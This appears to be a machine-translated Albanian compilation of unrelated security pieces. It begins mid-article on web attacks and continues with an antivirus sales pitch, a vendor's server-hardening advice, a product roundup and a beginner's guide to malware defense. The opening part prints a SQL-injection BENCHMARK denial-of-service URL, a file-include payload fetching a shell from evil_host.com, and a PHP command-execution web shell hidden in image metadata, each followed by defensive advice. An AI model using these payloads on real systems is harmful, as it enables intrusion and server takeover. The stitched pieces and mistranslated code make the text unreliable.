    Domethënë, hakeri dëshiron që kërkesa e tij të ekzekutohet përveç kërkesës suaj, e kombinuar me tuajën duke përdorur direktivën e sindikatës. Dhe më pas hakeri do të përpiqet të bëjë pyetje të tjera dhe, duke pasur parasysh fuqinë e gjuhës SQL, kjo nuk i sjell mirë administratorit. Nga deface (deface - zëvendësimi i faqes fillestare të faqes) deri në marrjen e të drejtave rrënjësore në serverin tuaj. Një haker mund të kryejë gjithashtu një sulm DoS falë injektimit SQL: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(data_aktuale))) disa kërkesa të tilla dhe serveri është në 100% CPU ngarkoni për një kohë të gjatë.

    Mbrojtja e injektimit SQL:

    • Përdorni gjerësisht veçoritë e SQL Server të tilla si pamjet dhe procedurat e ruajtura. Kjo do të kufizojë aksesin e paautorizuar në bazën e të dhënave.
    • Përpara se të kaloni një parametër në kërkesë, ai duhet të kontrollohet për llojin (për PHP - is_bool (), is_float (), is_int (), is_string (), is_object (), is_array () dhe is_integer ()) dhe, të paktën , cituar duke përdorur konstruktin e tipit addslashes për PHP.
    • Të gjitha skriptet punojnë me bazën e të dhënave nga një llogari e bazës së të dhënave, hiqni të gjitha privilegjet nga kjo llogari që nuk nevojiten për punë. Shpesh hakerët përdorin komandën MySQL (MySQL merret si shembull, kjo vlen për çdo server SQL) "LOAD DATA INFILE" për të lexuar skedarët që u nevojiten nga serveri dhe llogaria e lexueshme në të cilën funksionon MySQL. Prandaj përfundimi, çaktivizoni privilegjet e panevojshme për skriptet tuaja, të tilla si FILE, të cilat nevojiten për të përdorur komandën LOAD DATA INFILE. Duhet të merret si bazë parimi i "minimumit bazë".
    • Llogaria e sistemit nën të cilën funksionon serveri SQL nuk duhet të ketë akses në faqet e sitit dhe skedarët e sistemit të serverit.
  • Lidhja e skedarëve. Përfshi skedarin. Le të themi se ekziston një faqe site.com/getnews.php?file=190607, por autori i skenarit, duke përdorur përfshirjen, e lidh faqen pa kontrolle.

    $file = $_KËRKESË["skedar"];
    përfshijnë ($file.".html");

    Hakeri do të zëvendësojë evil_host.com/shell.php në vend të 190607 dhe më pas i gjithë shiriti i adresave të shfletuesit të hakerëve do të duket si ky site.com/postnews.php?file=evil_host.com/shell.php dhe hakeri do të ketë guaskën e tij të internetit në faqen tuaj me të drejtat që ka Apache.

    Mbrojtja e lidhjes së skedarit:

    • Kontrolloni dhe filtroni në skriptet tuaja të gjithë parametrat që përdoruesi fut dhe i kalohen skriptit përmes shiritit të adresave. Për gjuhën tuaj të programimit, gjeni material që ju mëson se si të kodoni në mënyrë të sigurt.
    • Hakerëve u pëlqen shumë kur gjuha e programimit në sit ju lejon të ekzekutoni komandat e sistemit. Prandaj, duhet të ndaloni thirrjen e funksioneve të tilla në gjuhën tuaj të programimit, nëse, natyrisht, kjo është e mundur. Për shembull, në cilësimet PHP është e mundur të specifikoni një listë të funksioneve "të ndaluara" duke përdorur disable_functions në php.ini.
  • Fotografi trojan
    Nëse keni aftësinë për të ngarkuar skedarë në serverin në sit, përgatituni të ngarkoni, për shembull, fotografitë e avatarit. Në një foto në formatin JPEG, ekziston koncepti i meta të dhënave (kujtoni ku kamera shkruan informacionin kur shkrep një kornizë) dhe këto meta të dhëna do të shkruhet

    ";passthru($_GET["cmd"]);echo ""; ?>

    imazhi do të riemërtohet avatara.jpg.php për të anashkaluar shumicën e kontrolleve shtesë dhe do të përdorë site.com/upload_images/avatara.jpg.php?cmd=server_commands

    Mbrojtja e Trojanit:

    • Kontrolloni saktë shtesën e skedarit. Edhe nëse i përpunoni skedarët e lejuar në mënyrë korrekte, përgatituni që imazhi nga jpg në php të riemërtohet duke përdorur një dobësi tjetër në faqen tuaj. Kontrolloni për metadata në një imazh me funksione si exif_read_data() në PHP.
    • Parandaloni ekzekutimin e gjuhëve të programimit në drejtoritë e imazheve me anë të serverit tuaj të internetit. Për ta bërë këtë, shikoni në linjat e konfigurimit të Apache si "AddType application/x-httpd-", të cilat lidhin gjuhët e programimit me shtesat e skedarëve dhe ndalojnë ekzekutimin e tyre në drejtoritë me imazhe. Për Apache, ndalimi i ekzekutimit të skedarëve të gjuhës PHP do të jetë një konstrukt


      Refuzo urdhër, lejo
      Moho nga të gjithë

    • Për gjuhën tuaj të programimit, gjeni material që ju mëson se si të kodoni në mënyrë të sigurt kur përpunoni imazhe dhe i ngarkoni saktë ato në server.

Falenderime personale:

  • miku Alexander Pupyshev aka rrëqebulli për kritikat dhe këshillat
  • faqja antichat.ru/
  • www.xakep.ru/
  • libër nga Michael Eben, Brian Taiman. Administrimi i FreeBSD: Arti i Balancimit
  • libër nga Joel Scambray, Stuart McClure, George Kurtz. Sekretet e hakerëve: Siguria e rrjetit - zgjidhje të gatshme. Edicioni i dyte

Burime të tjera informacioni për mbrojtjen:

  • Faqja e njeriut të sigurisë së FreeBSD përmban një përshkrim të çështjeve të zakonshme të sigurisë dhe praktikave të mira të administrimit.
  • Abonohu ​​në listat e postimeve freebsd-security @ freebsd.org. Për ta bërë këtë, dërgoni një email te majordomo @ freebsd.org me subscribe freebsd-security në trupin e mesazhit. Është në këtë listë postimesh që më të diskutuarit problemet aktuale mbrojtjes.
  • Faqja e informacionit të sigurisë FreeBSD freebsd.org/security/
  • Dokumenti i udhëzimeve për sigurinë e FreeBSD
  • Faqja e internetit CERT.org përmban informacione rreth dobësitë ah në mbrojtjen e të gjitha sistemeve operative.
  • Firewalls & Internet Security nga William R. Cheswick dhe Steven M. Bellowin
  • Ndërtimi i mureve të zjarrit në internet, botimi i dytë nga Brent Chapman dhe Elizabeth Zwicky

Rezultati:
Shpresoj se artikulli ju ndihmoi të shihni të gjitha problemet së bashku, tani administratori duhet të lexojë në lidhje me sigurinë e kompjuterit, bazat e të dhënave, serverët në internet, gjuhët e programimit nga burime shtesë. Duke përmbledhur shkurtimisht artikullin, duhet të jeni të vetëdijshëm për lajmet për lëshimin e problemeve të sigurisë, të përditësoni dhe kontrolloni të gjitha të dhënat hyrëse për korrektësi në zhvillimet tuaja.
Le të jetë forca me ju!

Në mënyrë që shërbimet softuerike të kompanisë të funksionojnë me sukses pa dështime, një cilësi të lartë instalimi, dhe konfigurimi i mbrojtjes antivirus. Sot, asnjë kompani nuk mund të bëjë pa përdorimin e internetit për kontabilitet, korrespondencë biznesi, raportim. Sistemi CRM është shumë popullor, por cilësia e punës së tij varet drejtpërdrejt nga lidhja me rrjetin global.

Përparësitë instalimet softuer për mbrojtjen nga viruset

Antivirus produktet kryejnë mbrojtjes nivele të ndryshme. Programet ndihmojnë në parandalimin e problemeve të tilla si:

  • vjedhja e informacionit nëpërmjet aksesit në distancë në server, duke përfshirë ato të një natyre konfidenciale (për shembull, të dhënat për aksesin në llogaritë e kompanisë);
  • futja e aplikacioneve të ndryshme të klientëve në sistemin operativ për të kryer sulme DDoS;
  • dështimi i pajisjeve të kompanisë për shkak të efekteve të dëmshme të programeve të ndryshme;
  • bllokimi, dëmtimi i programeve të nevojshme për funksionim dhe serverët;
  • vjedhja, falsifikimi ose shkatërrimi i të dhënave konfidenciale.

Për ta përmbledhur, përfundimi do të jetë një - zbatimi antivirus baza do të ndihmojë kompaninë të shmangë humbje të mëdha financiare. Për më tepër, kjo vlen jo vetëm për parandalimin e hakimit të mundshëm serverët, por edhe për të ruajtur funksionalitetin e pajisjeve dhe sistemeve online me pagesë. Kjo është arsyeja pse pyetja cilësimet cilësore dhe efikase mbrojtjes gjithmonë relevante për bizneset e të gjitha madhësive.

Softueri më i njohur për instalimet ne zyre

Më shpesh, klientët preferojnë vendosjen versione të ndryshme antivirus Kaspersky. Popullariteti i këtij produkti softuer është për shkak të karakteristikave të mëposhtme:

  • një numër i madh opsionesh për bizneset e vogla, të mesme dhe të mëdha, një linjë e veçantë për përdorim shtëpiak;
  • komplekset softuerike Kaspersky projektuar për instalimi jo vetëm në detyrë serverët, por edhe në Telefonat celular, laptopë;
  • serverët bashkëpunimi, posta, skedarë të ndryshëm janë të mbrojtur në mënyrë të sigurt antivirale produkt
  • antivirus Kaspersky kundërvepron sulmet në portat e internetit;
  • vendosjen produkti eliminon kërcënimin e brendshëm të sulmit serverët, pasi nënkupton diferencimin e të drejtave të përdoruesit.

Ndër përfitimet e tjera instalimet të sistemit të specifikuar antivirus - rezervimi i të dhënave, ruajtja e fjalëkalimit dhe plotësimi automatik i formularëve të Internetit në një mënyrë të sigurt, duke parandaluar hyrjen në serverët spam, phishing. Përveç kësaj, çmimi mbrojtjes këto produkte janë shumë të dobishme. Për përdoruesit që janë pak të përgatitur në ndërlikimet e programimit, zhvilluesit e antiviruseve Kaspersky krijoi një ndërfaqe të përshtatshme, të thjeshtë dhe intuitive.

Çfarë duhet të kërkoni kur zgjidhni softuerin e sigurisë?

  • për të mbrojtur çfarë serverët llogariten softuer specifik: shtëpi, biznese të vogla dhe të mesme, kompani të mëdha;
  • gjerësia e mbulimit të programeve të propozuara lokale serverët biznes;
  • vazhdimësia e punës, shpeshtësia dhe kushtet e përditësimit;
  • mundësia e menaxhimit të centralizuar të sistemit antivirus;
  • përputhshmëria e produktit të propozuar me programet e instaluara të biznesit dhe softuerët e tjerë.

Një pikë e rëndësishme është edhe zgjedhja e një kompanie që zbaton produkte të tilla. Një punonjës i kualifikuar do të vendosë punën e duhur në kohën më të shkurtër të mundshme dhe do të udhëzojë klientët se si të përdorin mjetet e programit kur punojnë me serverët. Kostoja e ofrimit të shërbimeve të tilla luan një rol të rëndësishëm - në kompaninë tonë është gjithmonë shumë fitimprurëse.

Është e pamundur të mbrosh një herë e mirë serverin nga aksesi i jashtëm, sepse çdo ditë zbulohen dobësi të reja dhe shfaqen mënyra të reja të hakimit të serverit. Ne do të flasim për mbrojtjen e serverëve nga aksesi i paautorizuar në këtë artikull.

Serverët e çdo kompanie herët a vonë mund të bëhen shënjestër për hakerim ose sulm virusesh. Në mënyrë tipike, rezultati i një sulmi të tillë është humbja e të dhënave, dëmtimi i reputacionit ose financiar, kështu që çështjet e sigurisë së serverit duhet të adresohen në radhë të parë.

Duhet të kuptohet se mbrojtja nga hakimi i serverit është një grup masash, duke përfshirë ato që nënkuptojnë monitorim të vazhdueshëm të funksionimit të serverit dhe punë për të përmirësuar mbrojtjen. Është e pamundur të mbrosh një herë e mirë serverin nga aksesi i jashtëm, sepse çdo ditë zbulohen dobësi të reja dhe shfaqen mënyra të reja të hakimit të serverit.

Ne do të flasim për mbrojtjen e serverëve nga aksesi i paautorizuar në këtë artikull.

Mënyrat dhe metodat e mbrojtjes së serverëve nga aksesi i paautorizuar

Mbrojtja fizike e serverit

Mbrojtje fizike. Është e dëshirueshme që serveri të jetë i vendosur në një qendër të sigurt të dhënash, një dhomë të mbyllur dhe të mbrojtur, të huajt nuk duhet të kenë akses në server.

Konfiguro vërtetimin SSH

Kur vendosni aksesin në server, përdorni vërtetimin e çelësit SSH në vend të një fjalëkalimi, pasi çelësat e tillë janë shumë më të vështirë dhe ndonjëherë thjesht të pamundur për t'u thyer duke përdorur një kërkim me forcë brutale.

Nëse mendoni se ju duhet ende një fjalëkalim, sigurohuni që të kufizoni numrin e përpjekjeve për ta futur atë.

Kushtojini vëmendje nëse shihni një mesazh si ky kur identifikoheni:

Identifikimi i fundit i dështuar: Mar 28 shtator 12:42:35 MSK 2017 nga 52.15.194.10 në ssh:notty
Pati 8243 përpjekje të dështuara për hyrje që nga identifikimi i fundit i suksesshëm.

Mund të tregojë se serveri juaj është hakuar. Në këtë rast, për të konfiguruar sigurinë e serverit, ndryshoni portën SSH, kufizoni listën e IP-ve nga të cilat është e mundur qasja në server ose instaloni softuer që bllokon automatikisht aktivitetin tepër të shpeshtë dhe të dyshimtë.

Instaloni përditësimet më të fundit rregullisht

Për të siguruar mbrojtjen e serverit, instaloni në kohë arnimet dhe përditësimet më të fundit të softuerit të serverit që përdorni - sistemi operativ, hipervizori, serveri i bazës së të dhënave.

Këshillohet që çdo ditë të kontrolloni për arna, përditësime dhe gabime/dobësi të raportuara për të parandaluar sulmet që shfrytëzojnë dobësitë e ditës zero. Për ta bërë këtë, regjistrohuni në lajmet nga kompania e zhvillimit të softuerit, ndiqni faqet e saj në rrjetet sociale.

Mbroni fjalëkalimet

Deri tani, një nga mënyrat më të zakonshme për të fituar akses në një server është të hapni fjalëkalimin e serverit. Prandaj, ndiqni rekomandimet e njohura, por gjithsesi relevante në mënyrë që të mos e lini serverin të pambrojtur:

  • mos përdorni fjalëkalime që janë të lehta për t'u hamendësuar, siç është emri i kompanisë;
  • nëse jeni duke përdorur ende fjalëkalimin e paracaktuar për tastierën e administratorit, ndryshojeni menjëherë;
  • fjalëkalimet për shërbime të ndryshme duhet të jenë të ndryshme;
  • nëse keni nevojë të ndani fjalëkalimin tuaj me dikë, mos dërgoni kurrë adresën tuaj IP, emrin e përdoruesit dhe fjalëkalimin në të njëjtin email ose mesazh të dërguarit;
  • Mund të konfiguroni "Verifikimin me 2 hapa" për t'u identifikuar në llogarinë e administratorit.

muri i zjarrit

  • Sigurohuni që serveri të ketë , të jetë i konfiguruar dhe të funksionojë gjatë gjithë kohës.
  • Mbroni trafikun në hyrje dhe në dalje.
  • Mbani gjurmët se cilat porta janë të hapura dhe për çfarë qëllimi, mos hapni asgjë të panevojshme për të zvogëluar numrin e dobësive të mundshme për hakimin e serverit.

Në veçanti, muri i zjarrit është shumë i dobishëm në mbrojtjen e serverit nga sulmet ddos, sepse mund të krijoni shpejt rregulla bllokimi të murit të zjarrit dhe të shtoni adresa IP nga vjen sulmi, ose të bllokoni aksesin në aplikacione të caktuara duke përdorur protokolle të caktuara.

Monitorimi dhe zbulimi i ndërhyrjeve

  • Kufizoni softuerin dhe shërbimet që funksionojnë në serverin tuaj. Kontrolloni periodikisht gjithçka që keni në punë dhe nëse gjenden procese të panjohura, fshijini ato menjëherë dhe filloni të kontrolloni për viruse.
  • Kontrolloni periodikisht për shenja të ngacmimit. Një hak mund të dëshmohet nga llogaritë e reja të përdoruesve që nuk keni krijuar, lëvizur ose fshirë një skedar /etc/syslog.conf, skedarë të fshirë /etc/hije Dhe /etc/passwrd.
  • Monitoroni serverin tuaj, mbani një sy shpejtësinë dhe xhiros normale të tij, në mënyrë që të vini re devijime, për shembull, kur ngarkesa në server është bërë shumë më e madhe se zakonisht.

Përdorimi i kriptimit VPN dhe SSL/TLS

Nëse kërkohet qasja në distancë në server, ajo duhet të lejohet vetëm nga disa adresa IP dhe të bëhet përmes VPN.

Hapi tjetër për të garantuar sigurinë mund të jetë konfigurimi i SSL, i cili jo vetëm që do të kodojë të dhënat, por gjithashtu do të verifikojë identitetin e pjesëmarrësve të tjerë në infrastrukturën e rrjetit duke lëshuar certifikata të përshtatshme për ta.

Kontrolli i sigurisë së serverit

Do të ishte një ide e mirë që të kontrolloni në mënyrë të pavarur sigurinë e serverit duke përdorur metodën pentest, d.m.th. simulimi i sulmit për të gjetur dobësitë e mundshme dhe për t'i eliminuar ato në kohë. Është e këshillueshme që të përfshihen specialistë në këtë siguria e informacionit, megjithatë, disa teste mund të bëhen në mënyrë të pavarur duke përdorur programe të hakimit të serverit.

Çfarë tjetër kërcënon serverët përveç hakerimit

Një server mund të dështojë për një sërë arsyesh të tjera përveçse për t'u hakuar. Për shembull, mund të jetë një infeksion malware ose thjesht një dështim fizik i njërit prej komponentëve.

Prandaj, masat për të mbrojtur serverin duhet të përfshijnë:

  • Instalimi dhe përditësimi i programeve për mbrojtjen e serverit - antiviruse.
  • Kopje të rregullta të koduara të të dhënave të paktën një herë në javë, sepse, sipas statistikave, hard disqet e serverëve janë në vendin e parë për sa i përket shpeshtësisë së prishjeve. Sigurohuni që kopjet rezervë të ruhen në një mjedis fizikisht të sigurt.
  • Sigurimi i furnizimit me energji të pandërprerë në dhomën e serverit.
  • Parandalimi fizik në kohë i serverëve, duke përfshirë pastrimin e tyre nga pluhuri dhe zëvendësimin e pastës termike.

Përvoja e specialistëve të Integrus na tregon se mbrojtja më e mirë ndaj kërcënimeve të tilla është aplikimi i praktikave më të mira në fushën e sistemeve të mbrojtjes së serverëve.

Për të garantuar sigurinë e serverëve të klientëve tanë, ne përdorim një kombinim mjetesh: muret e zjarrit, antiviruset, teknologjitë e sigurisë / menaxhimit të ngjarjeve (SIM / SEM), teknologjitë e zbulimit / mbrojtjes nga ndërhyrjet (IDS / IPS), teknologjitë e analizës së sjelljes së rrjetit (NBA). , sigurisht serverët e rregullt të mirëmbajtjes parandaluese dhe rregullimi i dhomave të sigurta të serverëve me çelësa në dorë. Kjo ju lejon të minimizoni rreziqet e hakimit ose dështimit të serverit për arsye të tjera.

Ne jemi të gatshëm të kryejmë një auditim sigurie të serverëve të kompanisë suaj, të konsultojmë specialistë, të kryejmë të gjitha llojet e punës për vendosjen e mbrojtjes së pajisjeve të serverit.

Një server është një kompjuter i specializuar, veprimet në të cilat ndodhin pa pjesëmarrjen aktive të përdoruesit. Zakonisht ka një shërbim software për të kryer detyra të caktuara. Nëpërmjet një kompjuteri të tillë shkëmbehen të dhënat, nisen veprimet, kryhen llogaritjet matematikore dhe shumë më tepër. Të gjithë serverët ndryshojnë në lloje, për shembull, ka serverë lojrash, ueb, postë dhe proxy. Çdo pajisje e tillë kryen një detyrë të përcaktuar qartë. Shpesh, për funksionimin e sigurt të një makinerie të tillë, në të është instaluar një antivirus, kështu që ne do të dëshironim t'ju tregojmë më shumë për një softuer të tillë, duke theksuar disa zgjidhje specifike.

Platforma: Windows Server

Kompania e mirënjohur antivirus Avast lëshon një asamble posaçërisht për serverët, duke ofruar mjete shtesë të dobishme. Për shembull, hidhini një sy funksionit "Shkatërrimi i të dhënave". Zbatohet në atë mënyrë që të mbishkruan informacionin e krijuar rastësisht në të gjitha të dhënat e fshira, gjë që nuk do të lejojë rikrijimin e gjendjes origjinale të skedarit kur përpiqeni ta rivendosni atë. Përveç kësaj, ekziston "Analiza e Sjelljes"- një mjet përgjegjës për skanimin e aplikacioneve të punës për aktivitete të dyshimta. Nëse Notepad përpiqet të hyjë në të njëjtën kamerë në internet, një kërkesë e tillë do të bllokohet menjëherë. Sigurisht, një shembull i tillë është i thjeshtë, por funksioni funksionon në një nivel më të lartë.

Avast Business Antivirus Pro ka gjithashtu një mur zjarri të integruar, skanim inteligjent, mbrojtje ndaj spamit, mbrojtje me fjalëkalim dhe hyrje më të lehtë në llogari. Ekziston gjithashtu një krahasim i vazhdueshëm i kërcënimeve të mundshme me bazën e të dhënave aktuale të viruseve duke përdorur teknologjinë mbrojtëse të softuerit. Kjo do t'ju lejojë të ndërveproni vetëm me të dhëna të verifikuara. Nga ana tjetër, mjeti CyberCapture do të dërgojë objekte të dyshimta në Laboratorin e Kërcënimeve.

Serveri antivirus Avira

Platforma: Windows Server

Avira Antivirus Server është një zgjidhje speciale nga kompania e zhvilluesve për serverët që përdorin sistemin operativ Windows. Krijuesit premtojnë maksimumin punë efikase me konsum të ulët të burimeve të sistemit, shkallë të lartë të zbulimit të kërcënimit dhe lehtësinë e përdorimit. Asambleja ka shtuar mjete për mbrojtje gjatë aksesit, domethënë monitoron proceset e ekzekutimit kur ato aksesohen nga aplikacione të tjera. Ekziston edhe skanimi manual, i cili ju lejon të filloni analizën e medias së specifikuar ose të një drejtorie të veçantë në çdo kohë.

Edhe një herë, vërejmë se zhvilluesi i kushton vëmendje të veçantë konsumit të ulët të burimeve të PC dhe lehtësisë së menaxhimit të antivirusit. Premtohen gjithashtu risi të vazhdueshme falas dhe përditësime të bazës së të dhënave të viruseve. Nëse jeni të interesuar të njiheni me këtë produkt, mund të merrni një version falas për një periudhë 30-ditore në faqen zyrtare të internetit duke plotësuar formularin përkatës. Gjatë testimit, të gjitha mjetet dhe funksionet do të jenë të disponueshme, si dhe një kontakt falas me shërbimin mbështetës.

Siguria e skedarit ESET

ESET File Security është krijuar për t'u ekzekutuar në serverët Windows dhe Linux dhe ofron mbrojtje me shumë shtresa falë komponentit shtesë ESET Dynamic Threat Defense kutia e resë së resë. Sistemi i mbrojtjes i bazuar në renë kompjuterike mbron automatikisht nga kërcënimet e reja pa pritur një përditësim të motorit të zbulimit (koha mesatare e specifikuar e përditësimit është 20 minuta). Mbrojtja e integruar e sulmit të rrjetit njeh dobësitë e njohura në nivel rrjeti dhe kur përdoret OneDrive, motori i ruajtjes së Office 365 OneDrive do ta skanojë atë. Vëmendje duhet t'i kushtohet gjithashtu parandalimit të ndikimit të botnets. Mjeti jo vetëm që gjen një lidhje me qëllim të keq, por gjithashtu zbulon të njëjtat procese, duke bllokuar menjëherë aktivitetin e rrezikshëm dhe duke njoftuar përdoruesin për të.

Për të menaxhuar ESET File Security, përdoruesit i kërkohet të instalojë konsolën në Windows ose Linux dhe ekziston një pajisje virtuale e importit për të thjeshtuar konfigurimin. Mund të njiheni me të gjithë funksionalitetin e këtij antivirusi, të provoni versionin e tij falas dhe të blini të plotë në faqen zyrtare të zhvilluesve.

siguria kaspersky

Platforma: Windows Server, Linux

Kaspersky Security për Serverët përfshihet në asamble - Total, Endpoint Security for Business, Kaspersky Security për mjedise virtuale dhe në renë kompjuterike dhe Kaspersky Security për sistemet e ruajtjes. Duke blerë një nga këto versione, ju merrni mbrojtje të besueshme për serverin tuaj nga gjenerata më e re malware. Softueri në fjalë ka mbrojtje të avancuar të serverit dhe siguron mbrojtje kundër shfrytëzimeve, mbrojtje të serverëve të terminalit, monitoron trafikun e jashtëm, integritetin e sistemit dhe mbron vazhdimisht sistemet e ruajtjes së të dhënave duke përdorur një mjet me shumë nivele. Sistemet e integruara të menaxhimit të të drejtave të administratorit ofrojnë lehtësi në menaxhim, njoftime, si dhe integrim me sistemet SIEM dhe menaxhimin e murit të zjarrit të Windows.

Dua të vërej se Kaspersky Security është i ndarë Kërkesat e sistemit për platforma specifike të ruajtjes, për shembull, për NetApp - Clustered Data ONTAP 8.x dhe 9.x dhe Data ONTAP 7.x dhe 8.x në modalitetin 7-modaliteti, dhe për seritë EMC Isilon - IBM System Storage N. Ju mund të njiheni me listën e të gjitha kërkesave kur shkarkoni antivirusin në faqen e internetit të Kaspersky.

Ndërmarrja McAfee VirusScan

Platforma: Windows Server, Linux

Më parë, përdoruesit instaluan McAfee Endpoint Security në serverët e tyre, por zhvilluesit vendosën ta përmirësojnë këtë produkt me një ndryshim të mëtejshëm në emrin e tij. Tani është VirusScan Enterprise. Kushdo që ka përdorur më parë këtë antivirus i ofrohet një migrim falas. Faqja zyrtare ofron të gjitha udhëzimet dhe mësimet e nevojshme për këtë çështje. në paketën bazë të veglave version i ri përfshin: murin e zjarrit, kontrollet në ueb për komunikimin e kërcënimeve, antivirusin e detyrueshëm dhe opsionet e parandalimit të shfrytëzimit.

McAfee VirusScan Enterprise përdor dhe metoda moderne mësimi i makinës. Teknologji të tilla bëjnë të mundur zbulimin e kodit me qëllim të keq përmes atributeve statike dhe të sjelljes. Malware përmbahet sapo hyn në sistem, duke e penguar atë të infektojë procese të tjera. Teknologjia e Zbulimit të pikës së fundit dhe Tesponse është përgjegjëse për zbulimin dhe përgjigjen e pikës fundore - kjo do t'ju lejojë t'i përgjigjeni kërcënimeve me një klik.

Comodo Antivirus për Linux

Platforma: Linux

Zhvilluesit e Comodo Antivirus kanë paraqitur një version të veçantë për sistemet operative të bazuara në kernelin Linux. Ky program mbështetet nga shumica e shpërndarjeve, si 32-bit ashtu edhe 64-bit. Nga veçoritë, dëshiroj të shënoj menjëherë filtrin e postës, i cili është i pajtueshëm me agjentët e njohur të postës: Postfix, Qmail, Sendmail dhe Exim MTA. Prodhuesi garanton mbrojtje të besueshme në kohë reale, lehtësi instalimi dhe pa hapa të komplikuar konfigurimi. Sistemi anti-spam mund të modifikohet plotësisht me dorë, por cilësimet standarde do të ofrojnë filtrim i mirë. Nëse përdoruesi dëshiron të marrë edhe më shumë kontroll mbi skedarët, ekziston një funksion për ta aktivizuar "Analiza e sjelljes në kohë reale". Të gjitha objektet e dyshimta do të dërgohen në serverin e analizës së sjelljes së resë kompjuterike.

Për përdorim të rehatshëm të Comodo Antivirus, do t'ju duhet një kompjuter me fuqi të lartë me një frekuencë minimale procesori prej 2 GHz dhe 2 GB RAM të lirë. Nuk duhet të shqetësoheni për ekzekutimin e skanimeve: do të mjaftojë të konfiguroni planin e tyre vetëm një herë, dhe në të ardhmen ato do të lansohen automatikisht. Është e mundur të filloni analizën në çdo kohë të përshtatshme duke shtypur vetëm një buton. Antivirusi në fjalë është me burim të hapur, shpërndahet pa pagesë dhe shkarkohet nga faqja zyrtare e internetit.

Chkrootkit

Platforma: Linux

Chkrootkit (Check Rootkit) është një program i përdorur gjerësisht nga administratorët e sistemit për të mbrojtur sistemin operativ nga rootkits të njohur. Një rootkit është një koleksion përbërësish, të tillë si skriptet, ekzekutuesit ose skedarët e konfigurimit, që kryejnë funksionin e maskimit, kontrollit dhe mbledhjes së të dhënave. Me ndihmën e mjeteve të tilla, sulmuesit depërtojnë në OS dhe marrin të gjithë informacionin e nevojshëm. Softueri i përmendur më sipër është krijuar vetëm për të mbrojtur kompjuterin nga ky lloj aktiviteti. Chkrootkit nuk kërkon instalim dhe mund të ekzekutohet nga një CD Live. Puna në të kryhet përmes çdo tastierë të përshtatshme, dhe menaxhimi është i qartë edhe për një përdorues të papërvojë.

Chkrootkit funksionon mjaft shpejt, e bën mirë punën e tij, nuk zë shumë hapësirë ​​në disk, por në të njëjtën kohë përmban një numër të madh modulesh për secilin lloj përdoruesi. Në faqen zyrtare të internetit, ka asamble të programit në shtesa të ndryshme, dhe shkarkimi është i disponueshëm nga një burim i drejtpërdrejtë ose nga disa pasqyra.

Ju jeni njohur me zgjidhjet antivirus që do të bëhen zgjidhja më e mirë Për lloje të ndryshme serverët. Siç mund ta shihni, çdo softuer ka karakteristikat e veta, kështu që do të jetë më i dobishëm në situata të caktuara.

Si të organizoni siç duhet mbrojtjen e rrjeteve kompjuterike nga malware.

Artikulli u drejtohet administratorëve fillestarë të sistemit.

Me mbrojtje antivirus, nënkuptoj mbrojtjen kundër çdo lloj malware: viruse, trojans, komplete root, backdoors,…

1 Hapi i mbrojtjes kundër viruseve - instaloni softuer antivirus në çdo kompjuter në rrjet dhe përditësoni atë të paktën çdo ditë. Skema e saktë përditësimet e bazave të të dhënave antivirus: 1-2 serverë shkojnë për përditësime dhe shpërndajnë përditësime në të gjithë kompjuterët në rrjet. Sigurohuni që të vendosni një fjalëkalim për të çaktivizuar mbrojtjen.

Softueri antivirus ka shumë disavantazhe. E meta kryesore është se ata nuk kapin viruse të shkruara me porosi dhe që nuk përdoren gjerësisht. E meta e dytë është se ata ngarkojnë procesorin dhe marrin memorie në kompjuterë, disa më shumë (Kaspersky), disa më pak (Eset Nod32), kjo duhet marrë parasysh.

Instalimi i softuerit antivirus është një mënyrë e detyrueshme, por e pamjaftueshme për t'u mbrojtur nga shpërthimet e viruseve, shpesh një nënshkrim virusi shfaqet në bazat e të dhënave antivirus të nesërmen pas shpërndarjes së tij, në 1 ditë një virus mund të paralizojë funksionimin e çdo rrjeti kompjuterik.

Zakonisht, administratorët e sistemit ndalojnë në hapin 1, më keq, ata nuk e përfundojnë atë ose nuk ndjekin përditësimet, dhe herët a vonë infeksioni ende ndodh. Më poshtë do të listoj hapa të tjerë të rëndësishëm për të forcuar mbrojtjen kundër viruseve.

Hapi 2 Politika e fjalëkalimit. Viruset (trojans) mund të infektojnë kompjuterët në rrjet duke hamendësuar fjalëkalimet për llogaritë standarde: root, admin, Administrator, Administrator. Përdorni gjithmonë fjalëkalime komplekse! Për llogaritë pa fjalëkalime ose me fjalëkalime të thjeshta, administratori i sistemit duhet të shkarkohet me një hyrje përkatëse në librin e punës. Pas 10 përpjekjeve për të futur një fjalëkalim të pasaktë, llogaria duhet të bllokohet për 5 minuta për t'u mbrojtur nga forca brutale (me hamendje të fjalëkalimit me numërim të thjeshtë). Rekomandohet shumë që llogaritë e integruara të administratorit të riemërohen dhe çaktivizohen. Fjalëkalimet duhet të ndryshohen periodikisht.

3 Hapi. Kufizimi i të drejtave të përdoruesit. Një virus (trojan) përhapet në rrjet në emër të përdoruesit që e ka nisur atë. Nëse të drejtat e përdoruesit janë të kufizuara: nuk ka qasje në kompjuterë të tjerë, nuk ka të drejta administrative në kompjuterin e tij, atëherë edhe një virus që funksionon nuk do të jetë në gjendje të infektojë asgjë. Nuk është e pazakontë që vetë administratorët e sistemit të bëhen fajtorët për përhapjen e një virusi: ata lëshuan gjeneratën e çelësit të administratorit dhe virusi shkoi për të infektuar të gjithë kompjuterët në rrjet ...

4 Hapi. Instalimi i rregullt i përditësimeve të sigurisë. Është punë e vështirë, por duhet bërë. Ju duhet të përditësoni jo vetëm OS, por edhe të gjitha aplikacionet: DBMS, serverët e postës.

Hapi 5 Kufizimi i mënyrave të depërtimit të viruseve. Viruset hyjnë në rrjetin lokal të një ndërmarrje në dy mënyra: përmes mediave të lëvizshme dhe përmes rrjeteve të tjera (Internet). Duke refuzuar aksesin në USB, CD-DVD, ju bllokoni plotësisht 1 rrugë. Duke kufizuar aksesin në internet, ju bllokoni rrugën e dytë. Kjo metodë është shumë efektive, por e vështirë për t'u zbatuar.

6 Hapi. Firewalls (ITU), ata janë gjithashtu firewalls (firewalls), ata janë gjithashtu firewalls. Ato duhet të instalohen në kufijtë e rrjetit. Nëse kompjuteri juaj është i lidhur drejtpërdrejt me internetin, atëherë ITU duhet të aktivizohet. Nëse kompjuteri është i lidhur vetëm me një rrjet lokal (LAN) dhe akseson internetin dhe rrjetet e tjera përmes serverëve, atëherë nuk është e nevojshme të aktivizoni ITU në këtë kompjuter.

